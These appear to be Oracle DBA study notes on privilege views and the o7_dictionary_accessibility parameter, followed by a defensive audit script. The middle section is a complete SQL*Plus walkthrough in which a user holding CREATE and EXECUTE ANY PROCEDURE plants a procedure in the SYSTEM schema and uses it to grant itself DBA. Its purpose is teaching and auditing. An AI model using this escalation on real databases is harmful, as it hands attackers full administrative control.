Basic views:
dba_tablespaces: tablespace name, type, data block size, etc.
database_properties: all properties of the DB, e.g. default_temp_tablespace, nls_language
v$session: view the currently logged-in users by sid, username, status; rows with an empty username belong to system users.
dba_users: all users, password, account status, expiry date, default tablespace, profile, etc.
dba_ts_quotas: each user's usage of a given tablespace: username, tablespace_name, blocks
session_privs/session_roles: your own privileges and your own roles, respectively
Views that expose privilege information:
dba_sys_privs: describes system privileges granted to users and roles. This view does not display the USERNAME column.
user_sys_privs: describes system privileges granted to the current user. This view does not display the GRANTEE column, but instead displays the USERNAME column. Use it to see your own system privileges.
session_privs: lists the privileges that are currently available to the user.
dba_tab_privs: describes the object grants for which the current user is the object owner, grantor, or grantee.
dba_col_privs: describes all column object grants in the database.
The system privilege SELECT ANY TABLE lets a user see any table that has been created, except the data dictionary views whose names begin with dba. This is where the parameter o7_dictionary_accessibility comes in: it controls the system privilege restriction. If it is set to true, such ANY privileges reach every object in the SYS schema. The default is, of course, false.
To drop someone else's table you need the DROP ANY TABLE system privilege:
SQL> show parameter o7
NAME TYPE VALUE
------------------------------------ ----------- ------------------------------
O7_DICTIONARY_ACCESSIBILITY boolean FALSE
SQL> alter system set o7_dictionary_accessibility = true;
alter system set o7_dictionary_accessibility = true
*
ERROR at line 1:
ORA-02095: specified initialization parameter cannot be modified
This shows the parameter cannot be changed in memory; it can only be changed in the spfile.
SQL> alter system set o7_dictionary_accessibility = true scope = spfile;
System altered.
# Takes effect after a restart. After that, anyone holding SELECT ANY TABLE can read the SYS dictionary, so do not turn this switch on lightly.
Master Tang's method for checking the Oracle security hole:
SQL> create user hacker identified by bbk_12345
2 default tablespace mytbs
3 quota unlimited on mytbs;
User created.
SQL> grant create session to hacker;
Grant succeeded.
SQL> grant create any procedure, execute any procedure to hacker;
Grant succeeded.
SQL> conn hacker/bbk_12345
Connected.
SQL> select * from session_privs;
PRIVILEGE
----------------------------------------
CREATE SESSION
CREATE ANY PROCEDURE
EXECUTE ANY PROCEDURE
SQL> select * from session_roles;
no rows selected
SQL> create procedure system.h1(h1_str in varchar2) as
2 begin
3 execute immediate h1_str;
4 end;
5 /
Procedure created.
SQL> execute system.h1('grant dba to hacker');
PL/SQL procedure successfully completed.
SQL> select * from session_privs;
PRIVILEGE
----------------------------------------
CREATE SESSION
UNLIMITED TABLESPACE
CREATE ANY PROCEDURE
EXECUTE ANY PROCEDURE
SQL> conn hacker/bbk_12345
Connected.
SQL> select * from session_privs; # after reconnecting the session now holds all DBA privileges
Insert, update and delete (DML) are object privileges. To grant them you must hold the grant option, which the creator has. To query a table created by someone else you must name that creator: select * from u01.t. But once ANY is appended, the privilege becomes a system privilege!
grant grant any object privilege to u02; when sys grants this to an ordinary user, that user can then grant object privileges on anything, for example:
grant select on u01.m to u03;
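An added audit script (my example, not from the original notes) that checks for the conditions the notes describe: grantees holding more than one of the dangerous ANY privileges, new code objects in the SYS/SYSTEM schemas such as the system.h1 procedure above, and the state of o7_dictionary_accessibility. It assumes a session with read access to the DBA views and v$parameter.

```sql
-- Added example, not part of the original notes. Run as a user with
-- SELECT on the DBA views (e.g. a DBA). Three checks tied to the
-- points above.

-- 1. Grantees (users or roles) holding two or more of the system
--    privileges the notes single out. The demo above needs
--    CREATE ANY PROCEDURE together with EXECUTE ANY PROCEDURE.
--    A grantee may be a role: check dba_role_privs for who holds it.
SELECT grantee,
       LISTAGG(privilege, ', ') WITHIN GROUP (ORDER BY privilege) AS privs
FROM   dba_sys_privs
WHERE  privilege IN ('CREATE ANY PROCEDURE', 'EXECUTE ANY PROCEDURE',
                     'SELECT ANY TABLE', 'DROP ANY TABLE',
                     'GRANT ANY OBJECT PRIVILEGE')
AND    grantee NOT IN ('SYS', 'SYSTEM', 'DBA')
GROUP BY grantee
HAVING COUNT(DISTINCT privilege) >= 2
ORDER BY grantee;

-- 2. Code objects created inside SYS/SYSTEM in the last 30 days.
--    system.h1 from the demo would appear here; a legitimate DBA
--    rarely creates new procedures in these schemas.
SELECT owner, object_name, object_type, created, last_ddl_time
FROM   dba_objects
WHERE  owner IN ('SYS', 'SYSTEM')
AND    object_type IN ('PROCEDURE', 'FUNCTION', 'PACKAGE', 'PACKAGE BODY')
AND    created > SYSDATE - 30
ORDER BY created DESC;

-- 3. The dictionary protection switch. Expected: value FALSE,
--    isdefault TRUE (the default the notes recommend keeping).
SELECT name, value, isdefault
FROM   v$parameter
WHERE  name = 'o7_dictionary_accessibility';
```

Any row returned by the first two queries deserves a review of how the grant or object came to exist; a change to the parameter in the third query only takes effect after a restart, so compare it with the spfile value as well.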